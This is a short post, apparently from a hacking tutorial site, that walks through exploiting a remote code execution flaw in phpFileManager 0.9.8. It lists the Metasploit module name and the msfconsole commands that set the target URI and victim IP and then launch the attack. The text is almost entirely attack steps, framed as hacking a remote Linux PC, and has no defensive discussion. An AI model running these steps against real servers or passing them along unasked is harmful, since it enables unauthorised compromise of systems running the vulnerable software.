This module exploits remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file.
Exploit Targets
phpFileManager 0.9.8
Requirement
Attacker: kali Linux
Victim PC: Linux
Open Kali terminal type msfconsole
Now type use exploit/multi/http/phpfilemanager_rce
msf exploit (phpfilemanager_rce)>set targeturi /phpfilemanager-0.9.8/index.php
msf exploit (phpfilemanager_rce)>set rhost 192.168.0.119 (IP of Remote Host)
msf exploit (phpfilemanager_rce)>exploit
The post Hack Remote Linux PC using PHPFilemanager 0.9.8 Remote Code Execution appeared first on Hacking Articles.